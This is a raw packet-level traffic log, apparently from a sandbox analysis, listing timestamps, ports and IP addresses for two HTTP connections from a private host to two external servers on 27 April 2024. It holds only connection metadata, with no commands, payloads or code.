Apr 27, 2024 01:31:17.231220961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231260061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231301069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.231383085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.231416941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.232501984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.232589006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.233299971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.233319044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.233347893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.233357906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.233366966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.233505964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.260422945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.428294897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.428441048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.428514004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.428565979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.428749084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.428798914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.428915977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.428957939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429001093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429023981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.429100990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429151058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.429279089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429406881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429450989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.429733992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429774046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429814100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429831982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.429867983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429905891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429944992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.429955959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.429991961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430017948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430057049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430089951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430095911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430104971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430135012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430138111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430174112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430229902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430243015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430269957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430313110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430313110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430335999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430352926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430389881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430403948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430429935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430466890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430468082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430495024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430510044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430516005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430548906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430557966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430588007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430594921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430627108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430639029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430668116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430672884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430713892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430723906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430763006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430767059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430802107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430810928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430840969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430847883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430879116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430885077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430917978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430926085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430955887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.430965900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.430996895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431008101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431036949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431042910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431076050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431087017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431114912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431123018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431154966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431170940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431194067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431200981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431231976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431240082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431271076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431277037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431309938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431318045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431349039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431364059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431385994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431391954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431426048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431432962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431466103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431471109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431505919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431543112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431552887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431581020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431586981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431622982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431636095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431660891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431687117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431700945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431704998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431740046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431745052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431777954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431782007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431818962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431833029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431857109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431862116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431895971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431902885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431936026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431950092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.431977987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.431989908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432018042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432041883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432055950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432069063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432094097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432132959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432145119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432147980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432187080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432199001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432226896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432236910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432267904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432279110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432307005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432321072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432347059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432359934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432388067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432393074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432429075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432431936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432467937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432476997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432507038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432512045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432544947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432559967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432590961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432595015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432631969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432635069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432670116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432679892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432710886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432730913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432764053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432806015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432813883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432845116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432857990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432883978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432888985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432924032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432929993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.432962894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.432969093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433002949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433007956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433042049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433048010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433079958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433089972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433120012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433157921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433161020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433196068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433201075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433233976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433240891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433273077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433274031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433311939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433315992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433351040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433353901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433389902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433427095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433434010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433466911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433504105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433510065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433542013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433547974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433581114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433585882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433621883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433654070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433661938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433687925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433701992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433703899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433741093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433769941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433779001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433794975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433819056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433856964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433862925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433871031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433896065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433914900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433934927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433947086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.433974028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.433984041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434014082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434015989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434052944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434091091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434098005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434130907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434135914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434169054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434173107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434209108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434215069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434247971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434284925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434290886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434324026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434329987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434361935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.434367895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.434397936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.434406042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.540066004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540169001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540201902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540251017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540267944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540293932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540326118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540375948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540393114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540427923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540466070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540492058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540513992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540545940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540592909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540611029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540632963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.540668011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.540713072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.624313116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624380112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624394894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624422073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624434948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624460936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624466896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624502897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624511003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624543905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624550104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624588966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624594927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624631882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624638081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624672890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624684095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624711990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624752045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.624767065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.624799967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.629731894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.629774094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.629800081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.629812002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.629816055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.629857063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.629863977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.629899979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.629905939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.629939079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.629940033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.629978895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.629987001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630022049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630031109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630060911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630064964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630099058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630114079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630139112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630146027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630178928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630182028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630219936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630228043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630259037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630287886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630296946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630321026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630336046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630347967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630376101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630404949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630420923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630439997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630460024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630469084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630501032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630511999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630541086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630551100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630579948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630582094 CEST	49734	80	192.168.2.4	176.97.76.106
